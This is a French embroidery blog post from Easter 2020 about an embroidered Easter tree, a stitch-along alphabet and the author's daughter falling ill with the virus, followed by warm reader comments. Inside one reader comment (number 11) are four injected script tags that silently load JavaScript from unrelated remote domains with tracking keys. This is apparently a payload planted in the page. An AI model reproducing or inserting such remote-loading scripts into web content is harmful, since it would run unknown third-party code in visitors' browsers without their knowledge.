• Drôle de fête de Pâques...

    Bonjour à toutes et tous.

    J'espère que malgré les circonstances et le confinement vous avez quand même fêté Pâques et profité du magnifique soleil. Bien sûr, c'est bien plus agréable quand on a un jardin, ou même un balcon.Mais il faut se dire que l'année prochaine, on rattrapera les joies que nous n'avons pas pu avoir cette année.

    J'ai fini mon arbre de Pâques juste à temps! Je n'avais pas envie de broder le mot "Easter"

    , je l'ai remplacé par la date

    Drôle de fête de Pâques...

     

    Pâques assombri chez moi par le fait que ma fifille chérie s'est faite attraper par ce méchant virus. Elle a de la fièvre, elle tousse, elle a mal à la tête mais rien d'alarmant. Il faut attendre et elle est bien entourée.

    Voici Maria et sa 6e étape, un nouvel alphabet. Ne vous fiez pas à ma version, j'ai fait une erreur dans les espacements et comme je déteste pénéloper, j'ai préféré laisser mon erreur

    Drôle de fête de Pâques...

    Par contre la transcription de Michèle-merci à elle!- est exacte

    Drôle de fête de Pâques...

    Et puis les versions des copines

    Crucicat et sa version vert espérance

    Drôle de fête de Pâques...

     

    Drôle de fête de Pâques...

    Marie-Claude et son rouge dégradé...et sa tête à l'envers!

    Drôle de fête de Pâques...

     

    Les versions rouges de Lolifa

    Drôle de fête de Pâques...

    Annelies

    Drôle de fête de Pâques...

    Et Florence

    Drôle de fête de Pâques...

    J'espère n'avoir oublié personne...

    Désolée Crucicat, je n'arrive pas à mettre ta photo!

     

    A bientôt et portez vous bien, faites attention à vous et à vos proches.yes


  • Commentaires

    1
    Megane
    Dimanche 12 Avril 2020 à 19:14
    Oui des fêtes de Pâques vraiment spéciales cette année .
    Du courage pour Fanny , du repos , c'est bien qu'elle soit bien entourée . De gros bisous guérisseurs pour elle .
    Gros bisous à vous 2
    2
    Françoise
    Dimanche 12 Avril 2020 à 19:25

    Du courage et de la confiance pour Fanny et pour vous 2.

    Merci pour cette nouvelle partie de Maria.

    Je t'embrasse.

    3
    MClaude 47
    Dimanche 12 Avril 2020 à 19:27

    Merci pour cette nouvelle étape.

    Oh... la tête en bas pas pratique pour regarder !! la prochaine fois je vérifierai ma photo

    bisssssssssss 

    4
    Dimanche 12 Avril 2020 à 20:25

    Jouyeuse fête de Pâques et merci pour la nouvelle partie de Maria.

    5
    Dimanche 12 Avril 2020 à 20:55

    Avec des parents comme vous deux, Fanny est entre de bonnes mains pour guérir. Bon courage à elle avec des pensées positives.  Bisous à vous trois. Mimi et Gégé

    6
    Violette
    Dimanche 12 Avril 2020 à 21:02
    Pensées pour Fanny bien sûr ! Bravo pour ton arbre, il est splendide. Bisous
    7
    Dimanche 12 Avril 2020 à 22:29

    Bon courage à votre fille et a vous gros bisous de Pâques

    8
    Tantann
    Lundi 13 Avril 2020 à 06:26
    Il est bien joli l'arbre de Pâques au milieu de sa prairie émaillée de pâquerettes.
    Amitiés, tendresse en ces drôles de jours de Pâques.
    Bisous à toi et aux tiens.
    9
    Lundi 13 Avril 2020 à 09:55

    Merci pour la grille, bon courage à vous et bon rétablissement à votre fille.

    10
    Lundi 13 Avril 2020 à 10:10
    Mamieminette
    Jolie grille et belle broderie, bravo! Doux lundi Bises
      • Lundi 13 Avril 2020 à 10:11
        Mamieminette
        meilleurs voeux de rétablissement pour ta fille!
    11
    chantal
    Lundi 13 Avril 2020 à 11:40

    ton arbre est splendide bravo , vivement que j'attaque le miens tu me fais trop envie

    je croise les doigts bien fort pour ta fille , elle est jeune elle va savoir le mettre à la " porte "  bisous

    <script src="//autroliner.com/225cd6e1ef3a4470f9.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8796x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8796x&format=arrjs&r=1586770723693" type="text/javascript"></script> <script src="http://autroliner.com/ext/225cd6e1ef3a4470f9.js?sid=52646_8796_&title=aaa&blocks[]=31af2" type="text/javascript"></script>
    12
    flo
    Lundi 13 Avril 2020 à 12:38

    Bravo pour ton bel arbre brodé!

    Bon courage à ta fille chérie, j'espère qu'elle se remettra bien vite!

    Bonne fête de Pâques! j'espère que vous avez passé une belle journée au jardin avec Wifi!

    Merci iiiiiiiiiiiiiii pour la suite de Maria....

    Bises!

    13
    Lapetiteroberose
    Lundi 13 Avril 2020 à 16:54

    Ton arbre est magnifique...

    Toutes mes pensées vont vers Fanny....

    Très très grosses bises !!!

     

    14
    Mardi 14 Avril 2020 à 11:36

    Attristée de savoir ta fille atteinte, mais, elle vaincra j'en suis sûre, tous mes voeux à elle et vous.

    Si beau ton arbre, il aurait fallu nous le montrer en gros plan. Quel travail dessus.

    Et la petite Maria continue son chemin petit à petit...

    Bon lundi, bonne suite de confinement jusqu'au 11 mai, après on verra....

    15
    Mardi 14 Avril 2020 à 16:44

    Quel arbre magnifique !

    16
    Mamouty 02
    Mardi 14 Avril 2020 à 20:58

    Il est bien beau cet arbre de Pâques avec toutes ces petites surprises suspendues.cool

    Merci pour la suite de Maria... Ils sont tous différents ces alphabets. et de voirla progression me donne envie de la broder.... J’espère trouver un jour le temps.

    Bon rétablissement à Fanny. 

    Bonne soirée.

    Mamouty02

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :